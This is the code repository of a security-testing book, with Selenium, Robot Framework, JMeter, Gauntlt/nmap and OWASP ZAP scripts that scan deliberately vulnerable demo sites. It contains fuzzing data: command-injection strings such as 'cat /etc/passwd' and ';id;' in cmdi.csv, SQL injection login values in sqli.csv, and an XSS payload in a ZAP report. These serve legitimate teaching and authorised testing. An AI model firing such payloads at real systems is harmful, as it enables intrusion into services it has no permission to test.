├── Chapter08
│   ├── readme
│   └── nmap.attack
├── Chapter09
│   ├── readme
│   └── ZAP RequestsSample.robot
├── Chapter11
│   ├── readme
│   ├── cmdi.csv
│   ├── Selenium Proxy Sample.py
│   ├── NodeGoat_SignIn_SB.py
│   ├── NodeGoat_SignIn.py
│   ├── NodeGoat.jmx
│   └── ZAP_Report.html
├── Chapter12
│   ├── readme
│   ├── RF_DDT.robot
│   └── SignIn_DDT_NodeGoat.py
├── Chapter13
│   ├── readme
│   ├── nmap_NodeGoat.robot
│   └── nmap_NodeGoat_gauntlt.attack
├── Chapter06
│   ├── readme
│   ├── Auto_ZAP_UserRegistration.BAT
│   ├── userregistration_SB.py
│   ├── AutoZAP.BAT
│   └── UserRegistration.py
├── Chapter05
│   ├── readme
│   ├── sqli.csv
│   ├── Generic-SQLi.txt.txt
│   └── MyRequest.jmx
├── LICENSE
└── README.md

/Chapter08/readme:
--------------------------------------------------------------------------------
(empty file)
--------------------------------------------------------------------------------
/Chapter09/readme:
--------------------------------------------------------------------------------
(empty file)
--------------------------------------------------------------------------------
/Chapter11/readme:
--------------------------------------------------------------------------------
(empty file)
--------------------------------------------------------------------------------
/Chapter12/readme:
--------------------------------------------------------------------------------
(empty file)
--------------------------------------------------------------------------------
/Chapter13/readme:
--------------------------------------------------------------------------------
(empty file)
--------------------------------------------------------------------------------
/Chapter06/readme:
--------------------------------------------------------------------------------
AutoZAP.BAT
--------------------------------------------------------------------------------
/Chapter05/readme:
--------------------------------------------------------------------------------
MyRequest.jmx
--------------------------------------------------------------------------------
/Chapter05/sqli.csv:
--------------------------------------------------------------------------------
username,password
a,a
)%20or%20('x'='x,''
%20or%201=1,' 1=1
--------------------------------------------------------------------------------
/Chapter11/cmdi.csv:
--------------------------------------------------------------------------------
pwd
last
cat /etc/passwd
ls -la /tmp
ver
chdir
+|+Dir+c:\
$+|+Dir+c:\
;id;
;id
;netstat -a;
;id;
|id
--------------------------------------------------------------------------------
/Chapter13/nmap_NodeGoat.robot:
--------------------------------------------------------------------------------
*** Settings ***
Library    Process

*** Test Cases ***
Testing if the website was previously reported XSS
    # Run Process takes the command and each argument as separate cells
    ${result} =    Run Process    nmap    -p80    --script    http-xssed    nodegoat.herokuapp.com
    Log    ${result.stdout}
    Should Contain    ${result.stdout}    No previously reported
--------------------------------------------------------------------------------
/Chapter06/Auto_ZAP_UserRegistration.BAT:
--------------------------------------------------------------------------------
REM 'start' lets the batch continue while ZAP runs; give the daemon time to come up
start "" ZAP -daemon -port 8090
timeout /T 30

REM the seleniumbase test (BaseCase) is the one that honours --browser and --proxy,
REM so its browser traffic is routed through ZAP on 127.0.0.1:8090
pytest userregistration_SB.py --browser=chrome --proxy=127.0.0.1:8090

timeout /T 30

CURL "http://localhost:8090/JSON/ascan/action/scan/?zapapiformat=JSON&formMethod=GET&url=http://hackazon.webscantest.com&recurse=&inScopeOnly=&scanPolicyName=&method=&postData=&contextId="

timeout /T 30

CURL "http://localhost:8090/HTML/core/view/alerts" > UserRegisterResult.html
--------------------------------------------------------------------------------
/Chapter11/Selenium Proxy Sample.py:
--------------------------------------------------------------------------------
from selenium import webdriver

# Replace the 'self.driver = webdriver.Firefox()' with the following
# (Firefox preferences are set through Options; 'network.proxy.type' is the real preference name)
options = webdriver.FirefoxOptions()
options.set_preference('network.proxy.type', 1)          # 1 = manual proxy configuration
options.set_preference('network.proxy.http', '127.0.0.1')
options.set_preference('network.proxy.http_port', 8090)  # must be an integer, not the string "8090"
driver = webdriver.Firefox(options=options)
# End of Replacement


driver.get('http://nodegoat.herokuapp.com/login')
driver.close()
--------------------------------------------------------------------------------
/Chapter08/nmap.attack:
--------------------------------------------------------------------------------
Feature: nmap attacks for scanme.nmap.org
  Background: It's used to check ScanMe website port listening status 22, 25, 80, 443

    Given "nmap" is installed
    And the following profile:
      | name           | value           |
      | hostname       | scanme.nmap.org |
      | host           | scanme.nmap.org |
      | tcp_ping_ports | 22,25,80,443    |

  Scenario: Verify server is open on the expected set of ports using the nmap-fast attack step
    When I launch a "nmap-fast" attack
    Then the output should match /80.tcp\s+open/
--------------------------------------------------------------------------------
/Chapter12/RF_DDT.robot:
--------------------------------------------------------------------------------
*** Settings ***
Library    Collections
Library    CSVLibrary
Library    SeleniumLibrary
Library    OperatingSystem
Library    String

*** Test Cases ***
SignIn_DDT
    Open Browser    http://nodegoat.herokuapp.com/login
    @{data}=    read csv file to list    sqli.csv
    Log    ${data}
    # each row of sqli.csv is a [username, password] pair
    FOR    ${x}    IN    @{data}
        Log    ${x}
        Input Text    id=userName    ${x}[0]
        Input Text    id=password    ${x}[1]
        Click Button    xpath=//button[@type='submit']
        Log    ${x}[0]
        Log    ${x}[1]
    END
    Close Browser
--------------------------------------------------------------------------------
/Chapter11/NodeGoat_SignIn_SB.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
from seleniumbase import BaseCase


class SignIn(BaseCase):

    def test_sign_in(self):
        self.open('http://nodegoat.herokuapp.com/login')
        self.update_text('#userName', 'user1')
        self.update_text('#password', 'User1_123')
        self.click("//button[@type='submit']")
        self.open('http://nodegoat.herokuapp.com/contributions')
        self.click("//button[@type='submit']")
        self.open('http://nodegoat.herokuapp.com/contributions')
        self.open('http://nodegoat.herokuapp.com/allocations/2')
        self.open('http://nodegoat.herokuapp.com/memos')
        self.open('http://nodegoat.herokuapp.com/profile')
--------------------------------------------------------------------------------
/Chapter06/userregistration_SB.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
from seleniumbase import BaseCase


class UserRegistration(BaseCase):

    def test_user_registration(self):
        self.open('http://hackazon.webscantest.com/')
        self.click("link=Sign In / Sign Up")
        self.click('#username')
        self.click("link=New user?")
        self.click('#first_name')
        self.update_text('#first_name', 'myFirstName')
        self.update_text('#last_name', 'myLastName')
        self.update_text('#username', 'myUserName1')
        self.update_text('#email', 'abc@a.com')
        self.update_text('#password', 'pass1234')
        self.update_text('#password_confirmation', 'pass1234')
        self.click("//input[@value='Register']")
--------------------------------------------------------------------------------
/Chapter09/ZAP RequestsSample.robot:
--------------------------------------------------------------------------------
*** Settings ***
Suite Teardown    Delete All Sessions
Library    Collections
Library    String
Library    RequestsLibrary
Library    OperatingSystem

*** Variables ***
${url}    http://demo.testfire.net
${SpiderScan}    http://localhost:8090/JSON/spider/action/scan/?zapapiformat=JSON&formMethod=GET&url=${url}&maxChildren=&recurse=&contextName=&subtreeOnly=

*** Test Cases ***
ZAP Spider Scan
    [Tags]    get    skip
    Create Session    ZAP    ${SpiderScan}
    ${resp}=    Get Request    ZAP    /
    Should Be Equal As Strings    ${resp.status_code}    200
    Create Session    ZAP    http://localhost:8090/HTML/core/view/alertsSummary/?zapapiformat=HTML&formMethod=GET&baseurl=
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2019 Packt

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/Chapter06/AutoZAP.BAT:
--------------------------------------------------------------------------------
echo start the ZAP in daemon mode
REM 'start' keeps the batch going; the API calls below expect ZAP on port 8090 (ZAP's default is 8080)
start "" ZAP.exe -daemon -port 8090
timeout 20

echo the status of ZAP
CURL http://localhost:8090

echo spider scan for the web site
CURL "http://localhost:8090/JSON/spider/action/scan/?zapapiformat=JSON&formMethod=GET&url=http://hackazon.webscantest.com"

echo Active Scan for the website
CURL "http://localhost:8090/JSON/ascan/action/scan/?zapapiformat=JSON&formMethod=GET&url=http://hackazon.webscantest.com&recurse=&inScopeOnly=&scanPolicyName=&method=&postData=&contextId="

echo Wait for 20 sec to complete the ActiveScan before generating the testing report
echo The timeout is for Windows command. For running in Linux, please change it to sleep.
timeout 20

echo List the security assessments results (alerts), and output the report to ZAP_Report.HTML
CURL "http://localhost:8090/JSON/ascan/view/status/"
CURL "http://localhost:8090/HTML/core/view/alerts/"
CURL "http://127.0.0.1:8090/OTHER/core/other/htmlreport/?formMethod=GET" > ZAP_Report.HTML

echo shutdown the ZAP
CURL "http://localhost:8090/JSON/core/action/shutdown/?zapapiformat=JSON&formMethod=GET"
--------------------------------------------------------------------------------
/Chapter11/NodeGoat_SignIn.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
import unittest


class SignIn(unittest.TestCase):
    def setUp(self):
        self.driver = webdriver.Firefox()
        self.driver.implicitly_wait(30)

    def test_sign_in(self):
        # find_element(By.*, ...) replaces the find_element_by_* helpers removed in Selenium 4
        driver = self.driver
        driver.get("http://nodegoat.herokuapp.com/login")
        driver.find_element(By.ID, "userName").clear()
        driver.find_element(By.ID, "userName").send_keys("user1")
        driver.find_element(By.ID, "password").clear()
        driver.find_element(By.ID, "password").send_keys("User1_123")
        driver.find_element(By.XPATH, "//button[@type='submit']").click()
        driver.get("http://nodegoat.herokuapp.com/contributions")
        driver.find_element(By.XPATH, "//button[@type='submit']").click()
        driver.get("http://nodegoat.herokuapp.com/contributions")
        driver.get("http://nodegoat.herokuapp.com/allocations/2")
        driver.get("http://nodegoat.herokuapp.com/memos")
        driver.get("http://nodegoat.herokuapp.com/profile")

    def tearDown(self):
        self.driver.quit()


if __name__ == "__main__":
    unittest.main()
--------------------------------------------------------------------------------
/Chapter12/SignIn_DDT_NodeGoat.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from ddt import ddt, data, unpack
import csv
import unittest


def get_csv_data(csv_path):
    """Return every data row of the CSV (header skipped) as a list of [username, password]."""
    rows = []
    # text mode with newline="" is what csv.reader expects on Python 3 ("rb" yields bytes)
    with open(str(csv_path), "r", newline="") as csv_data:
        content = csv.reader(csv_data)
        next(content, None)  # skip the 'username,password' header row
        for row in content:
            rows.append(row)
    return rows


@ddt
class NodeGoatSignIn(unittest.TestCase):

    def setUp(self):
        # plain instance method (not a classmethod): a fresh browser per data row
        self.driver = webdriver.Firefox()
        self.driver.implicitly_wait(30)

    # @data and @unpack feed every row of 'sqli.csv' to test_sign_in as (username, password)
    @data(*get_csv_data("sqli.csv"))
    @unpack
    def test_sign_in(self, username, password):
        driver = self.driver

        driver.get("http://nodegoat.herokuapp.com/login")
        driver.find_element(By.ID, "userName").click()
        driver.find_element(By.ID, "userName").clear()
        driver.find_element(By.ID, "userName").send_keys(username)
        driver.find_element(By.ID, "password").click()
        driver.find_element(By.ID, "password").clear()
        driver.find_element(By.ID, "password").send_keys(password)
        driver.find_element(By.XPATH, "//button[@type='submit']").click()

    def tearDown(self):
        self.driver.quit()


if __name__ == "__main__":
    unittest.main()
--------------------------------------------------------------------------------
/Chapter05/Generic-SQLi.txt.txt:
--------------------------------------------------------------------------------
(SQL injection fuzz-string wordlist; contents omitted)
--------------------------------------------------------------------------------
/Chapter13/nmap_NodeGoat_gauntlt.attack:
--------------------------------------------------------------------------------
@slow

Feature: nmap attacks for website. It will cover the following testing: security header check, HTTP Slow DOS check, SSL cipher check, XSSed History Check, SQL Injection and the Stored XSS.

  Background:
    Given "nmap" is installed
    And the following profile:
      | name | value                  |
      | host | nodegoat.herokuapp.com |


  Scenario: Verify the security header using the http-security-headers
    When I launch a "nmap" attack with:
      """
      nmap -p80 --script http-security-headers <host>
      """
    Then the output should contain "X-Frame-Options: DENY"


  Scenario: Verify if the server is vulnerable to HTTP SLOW DOS attack
    When I launch an "nmap" attack with:
      """
      nmap -p80,443 --script http-slowloris-check <host>
      """
    Then the output should not contain:
      """
      LIKELY VULNERABLE
      """

  Scenario: Verify the uses of SSL
    When I launch an "nmap" attack with:
      """
      nmap --script=ssl-enum-ciphers <host>
      """
    Then the output should not contain:
      """
      SSL
      """

  Scenario: Was there any reported XSS history of the website?
    When I launch an "nmap" attack with:
      """
      nmap -p80 --script http-xssed.nse <host>
      """
    Then the output should not contain:
      """
      xssed.com found the following previously reported XSS vulnerabilities marked as unfixed
      """

  Scenario: Verify any potential SQL injection of the website.
    When I launch an "nmap" attack with:
      """
      nmap -sV --script=http-sql-injection <host>
      """
    Then the output should not contain:
      """
      Possible sqli for
      """

  Scenario: Verify any potential Stored XSS
    When I launch an "nmap" attack with:
      """
      nmap -p80 --script http-stored-xss.nse <host>
      """
    Then the output should contain:
      """
      Couldn't find any stored XSS vulnerabilities.
      """
--------------------------------------------------------------------------------
/Chapter06/UserRegistration.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest


class UserRegistration(unittest.TestCase):
    def setUp(self):
        self.driver = webdriver.Firefox()
        self.driver.implicitly_wait(30)
        self.verificationErrors = []
        self.accept_next_alert = True

    def test_user_registration(self):
        # find_element(By.*, ...) replaces the find_element_by_* helpers removed in Selenium 4
        driver = self.driver
        driver.get("http://hackazon.webscantest.com/")
        driver.find_element(By.LINK_TEXT, "Sign In / Sign Up").click()
        driver.find_element(By.ID, "username").click()
        driver.find_element(By.LINK_TEXT, "New user?").click()
        driver.find_element(By.ID, "first_name").click()
        driver.find_element(By.ID, "first_name").clear()
        driver.find_element(By.ID, "first_name").send_keys("FirstName")
        driver.find_element(By.ID, "last_name").clear()
        driver.find_element(By.ID, "last_name").send_keys("LastName")
        driver.find_element(By.ID, "username").clear()
        driver.find_element(By.ID, "username").send_keys("UserName1")
        driver.find_element(By.ID, "email").clear()
        driver.find_element(By.ID, "email").send_keys("abc@a.com")
        driver.find_element(By.ID, "password").clear()
        driver.find_element(By.ID, "password").send_keys("pass1234")
        driver.find_element(By.ID, "password_confirmation").clear()
        driver.find_element(By.ID, "password_confirmation").send_keys("pass1234")
        driver.find_element(By.XPATH, "//input[@value='Register']").click()

    def is_element_present(self, how, what):
        try:
            self.driver.find_element(by=how, value=what)
        except NoSuchElementException:
            return False
        return True

    def is_alert_present(self):
        # switch_to.alert raises NoAlertPresentException when no alert is open
        try:
            self.driver.switch_to.alert
        except NoAlertPresentException:
            return False
        return True

    def close_alert_and_get_its_text(self):
        try:
            alert = self.driver.switch_to.alert
            alert_text = alert.text
            if self.accept_next_alert:
                alert.accept()
            else:
                alert.dismiss()
            return alert_text
        finally:
            self.accept_next_alert = True

    def tearDown(self):
        self.driver.quit()
        self.assertEqual([], self.verificationErrors)


if __name__ == "__main__":
    unittest.main()
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Practical Security Automation and Testing

This is the code repository for [Practical Security Automation and Testing](https://www.packtpub.com/networking-and-servers/practical-security-automation-and-testing?utm_source=github&utm_medium=repository&utm_campaign=9781789802023), published by Packt.

**Tools and techniques for automated security scanning and testing in DevSecOps**

## What is this book about?
Security automation is the automatic handling of software security assessment tasks. This book helps you to build your security automation framework to scan for vulnerabilities without human intervention.
This book covers the following exciting features:
* Automate secure code inspection with open source tools and effective secure code scanning suggestions
* Apply security testing tools and automation frameworks to identify security vulnerabilities in web, mobile and cloud services
* Integrate security testing tools such as OWASP ZAP, NMAP, SSLyze, SQLMap, and OpenSCAP
* Implement automation testing techniques with Selenium, JMeter, Robot Framework, Gauntlt, BDD, DDT, and Python unittest
* Execute security testing of a REST API
* Implement web application security with open source tools and script templates for CI/CD integration

If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1789802024) today!

## Instructions and Navigations
All of the code is organized into folders. For example, Chapter02.

The code will look like the following:
```java
saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```

**Following is what you need for this book:**
The book is for software developers, architects, testers and QA engineers who are looking to leverage automated security testing techniques.

With the following software and hardware list you can run all code files present in the book (Chapter 1-15).

### Software and Hardware List

| Chapter | Software required | OS required                        |
| ------- | ----------------- | ---------------------------------- |
| 1-15    | Virtual machine   | Windows, Mac OS X, and Linux (Any) |
| 1-15    | ZAP               | Windows, Mac OS X, and Linux (Any) |

We also provide a PDF file that has color images of the screenshots/diagrams used in this book. [Click here to download it](https://www.packtpub.com/sites/default/files/downloads/9781789802023_ColorImages.pdf).

### Related products
* Cloud Security Automation [[Packt]](https://www.packtpub.com/networking-and-servers/cloud-security-automation?utm_source=github&utm_medium=repository&utm_campaign=9781788627863) [[Amazon]](https://www.amazon.com/dp/1788627865)

* Security Automation with Ansible 2 [[Packt]](https://www.packtpub.com/virtualization-and-cloud/security-automation-ansible-2?utm_source=github&utm_medium=repository&utm_campaign=9781788394512) [[Amazon]](https://www.amazon.com/dp/1788394518)

## Get to Know the Author
**Tony Hsiang-Chih Hsu**
is a senior security architect, software development manager, and project manager with more than 20 years' experience in security services technology. He has extensive experience of the Secure Software Development Lifecycle (SSDLC) in relation to activities including secure architecture/design review, secure code review, threat modeling, automated security testing, and cloud service inspection. He is also an in-house SDL trainer, having offered hands-on courses totaling more than 300 hours. He is also the author of Hands-On Security in DevOps, and a co-author of several Open Web Application Security Project (OWASP) projects, including the OWASP testing guide, a proactive control guide, deserialization, cryptographic, and the XXE prevention cheatsheet.

## Other books by the author
* [Hands-On Security in DevOps](https://www.packtpub.com/networking-and-servers/hands-security-devops?utm_source=github&utm_medium=repository&utm_campaign=9781788995504)

### Suggestions and Feedback
[Click here](https://docs.google.com/forms/d/e/1FAIpQLSdy7dATC6QmEL81FIUuymZ0Wy9vH1jHkvpY57OiMeKGqib_Ow/viewform) if you have any feedback or suggestions.

### Download a free PDF

If you have already purchased a print or Kindle version of this book, you can get a DRM-free PDF version at no cost.
Simply click on the link to claim your free PDF.

https://packt.link/free-ebook/9781789802023

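The two Chapter06 .BAT files above drive the ZAP API with curl and a fixed `timeout` before reading the alerts. The following Python example is added here and is not part of the book's repository: it runs the same spider, active-scan, alerts sequence against the ZAP JSON API but polls the scan status until ZAP reports 100% instead of sleeping. `ZAP_API`, the `apikey` handling, `make_fake_zap` and `SAMPLE_ALERTS` are assumptions and constructed stand-ins, so the flow can be exercised without a live daemon.

```python
"""Added example: the AutoZAP.BAT sequence (spider -> active scan -> alerts) driven through
the ZAP JSON API, polling scan status instead of a fixed 'timeout 20'."""
import json
import time
import urllib.parse
import urllib.request

ZAP_API = "http://127.0.0.1:8090"   # daemon address the .BAT scripts use (assumed reachable)


def fetch_json(url):
    """Default transport: HTTP GET against the ZAP API and decode the JSON body."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))


class ZapClient:
    """Small ZAP API client. `fetch` and `sleep` are injectable so the same flow can be run
    offline against make_fake_zap() below."""

    def __init__(self, base=ZAP_API, apikey=None, fetch=fetch_json, sleep=time.sleep):
        self.base, self.apikey, self.fetch, self.sleep = base, apikey, fetch, sleep

    def url(self, component, kind, name, **params):
        """Build <base>/JSON/<component>/<kind>/<name>/?... the way the .BAT curls do.
        Recent ZAP releases reject calls without the 'apikey' parameter unless the key is disabled."""
        if self.apikey:
            params["apikey"] = self.apikey
        query = urllib.parse.urlencode(params)
        return f"{self.base}/JSON/{component}/{kind}/{name}/" + (f"?{query}" if query else "")

    def start_scan(self, component, target):
        """Start a spider ('spider') or active scan ('ascan'); ZAP answers {"scan": "<id>"}."""
        body = self.fetch(self.url(component, "action", "scan", url=target, recurse="true"))
        return str(body["scan"])

    def wait_for_scan(self, component, scan_id, poll_seconds=5, max_polls=120):
        """Poll /<component>/view/status/ until the percentage reaches 100; this is the check the
        fixed 'timeout 20' in the batch file cannot give. Returns the final status."""
        for _ in range(max_polls):
            body = self.fetch(self.url(component, "view", "status", scanId=scan_id))
            status = int(body["status"])
            if status >= 100:
                return status
            self.sleep(poll_seconds)
        raise TimeoutError(f"{component} scan {scan_id} still running after {max_polls} polls")

    def alert_counts(self, target):
        """Count alerts per risk level: the figures the report's 'Summary of Alerts' table shows."""
        counts = {"High": 0, "Medium": 0, "Low": 0, "Informational": 0}
        for alert in self.fetch(self.url("core", "view", "alerts", baseurl=target))["alerts"]:
            counts[alert["risk"]] = counts.get(alert["risk"], 0) + 1
        return counts

    def run_pipeline(self, target):
        """Spider, wait, active-scan, wait, then summarise: AutoZAP.BAT without fixed sleeps."""
        spider_id = self.start_scan("spider", target)
        self.wait_for_scan("spider", spider_id)
        ascan_id = self.start_scan("ascan", target)
        self.wait_for_scan("ascan", ascan_id)
        return self.alert_counts(target)


def make_fake_zap(statuses, alerts):
    """Constructed stand-in for a ZAP daemon so the flow runs offline: each scan's status walks
    through `statuses` (last value repeated) and the alerts view returns `alerts`.
    Returns (fetch, calls) where calls records every URL requested."""
    calls = []
    remaining = {"spider": list(statuses), "ascan": list(statuses)}

    def fetch(url):
        calls.append(url)
        path = urllib.parse.urlparse(url).path          # e.g. /JSON/ascan/view/status/
        component = path.split("/")[2]
        if path.endswith("/action/scan/"):
            return {"scan": "0"}
        if path.endswith("/view/status/"):
            queue = remaining[component]
            return {"status": str(queue.pop(0) if len(queue) > 1 else queue[0])}
        if path.endswith("/core/view/alerts/"):
            return {"alerts": alerts}
        raise ValueError("unexpected ZAP API call: " + url)

    return fetch, calls


# Constructed alerts matching the counts in Chapter11/ZAP_Report.html (3 High, 2 Medium, 6 Low)
SAMPLE_ALERTS = [{"risk": r} for r in ["High"] * 3 + ["Medium"] * 2 + ["Low"] * 6]

if __name__ == "__main__":
    fake_fetch, calls = make_fake_zap([0, 50, 100], SAMPLE_ALERTS)
    client = ZapClient(fetch=fake_fetch, sleep=lambda seconds: None)
    print(client.run_pipeline("http://hackazon.webscantest.com"))
    print(len([u for u in calls if "/view/status/" in u]), "status polls")
```

Against a real daemon, construct `ZapClient(apikey="...")` with the key shown in ZAP's API options and leave `fetch` and `sleep` at their defaults.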
-------------------------------------------------------------------------------- /Chapter05/MyRequest.jmx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | false 7 | true 8 | false 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | continue 17 | 18 | false 19 | 30 20 | 21 | 1 22 | 1 23 | false 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | false 33 | user 34 | = 35 | true 36 | uid 37 | 38 | 39 | false 40 | ${password} 41 | = 42 | true 43 | passw 44 | 45 | 46 | false 47 | Login 48 | = 49 | true 50 | btnSubmit 51 | 52 | 53 | 54 | demo.testfire.net 55 | 80 56 | http 57 | 58 | /bank/login.aspx 59 | POST 60 | true 61 | false 62 | true 63 | false 64 | 65 | 127.0.0.1 66 | 8090 67 | 68 | 69 | 70 | 71 | 72 | 73 | , 74 | 75 | sqli.csv 76 | false 77 | false 78 | true 79 | shareMode.group 80 | false 81 | password 82 | 83 | 84 | 85 | false 86 | 87 | saveConfig 88 | 89 | 90 | true 91 | true 92 | true 93 | 94 | true 95 | true 96 | true 97 | true 98 | false 99 | true 100 | true 101 | false 102 | false 103 | false 104 | true 105 | false 106 | false 107 | false 108 | true 109 | 0 110 | true 111 | true 112 | true 113 | true 114 | true 115 | true 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /Chapter11/NodeGoat.jmx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | false 7 | true 8 | false 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | continue 17 | 18 | false 19 | 1 20 | 21 | 1 22 | 1 23 | false 24 | 25 | 26 | 27 | 28 | 29 | 30 | false 31 | 32 | 33 | 34 | 35 | 36 | Referer 37 | http://nodegoat.herokuapp.com/dashboard 38 | 39 | 40 | User-Agent 41 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 42 | 43 | 44 | Accept 45 | text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 46 | 47 | 48 | Accept-Encoding 49 | 
[JMeter test plan (remainder of a .jmx file). The XML element names were lost in extraction, so only the recoverable values are listed here; unlabelled boolean and numeric settings (result-collector and sampler flags) are omitted.]

Header Manager values:
  gzip, deflate
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1

HTTP Request: POST http://nodegoat.herokuapp.com/login
  Parameters: userName=user1, password=User1_123, _csrf=(empty)
  Response Assertion on Assertion.response_data, test_type 2 (Contains): "Employee Retirement Savings Management"

HTTP Request: GET nodegoat.herokuapp.com/contributions
  Response Assertion on Assertion.response_data, test_type 16 (Substring): "Employee Pre-Tax"

HTTP Request: GET nodegoat.herokuapp.com/allocations/2
  Response Assertion on Assertion.response_data, test_type 16 (Substring): "Stock Performance"

HTTP Request: GET nodegoat.herokuapp.com/memos
  Response Assertion on Assertion.response_data, test_type 16 (Substring): "Send a memo"

HTTP Request: GET nodegoat.herokuapp.com/profile
  Response Assertion on Assertion.response_data, test_type 16 (Substring): "My Profile"

HTTP Request: POST nodegoat.herokuapp.com/profile
  Parameters: firstName=a, lastName=b, ssn=123, dob=1234-02-01, bankAcc=123123, bankRouting=0198212#, address=add, _csrf=(empty)
  Response Assertion on Assertion.response_data, test_type 16 (Substring): "Profile updated successfully."

HTTP Request: GET nodegoat.herokuapp.com/logout
  Response Assertion on Assertion.response_data, test_type 16 (Substring): "New user?"

--------------------------------------------------------------------------------
/Chapter11/ZAP_Report.html:
--------------------------------------------------------------------------------

ZAP Scanning Report

Summary of Alerts

Risk Level       Number of Alerts
High             3
Medium           2
Low              6
Informational    0

Alert Detail
High (Medium): Cross Site Scripting (Reflected)
Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: userName
Attack: "><script>alert(1);</script>
Evidence: "><script>alert(1);</script>

URL: http://nodegoat.herokuapp.com/signup
Method: POST
Parameter: email
Attack: "><script>alert(1);</script>
Evidence: "><script>alert(1);</script>

Instances: 2
Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

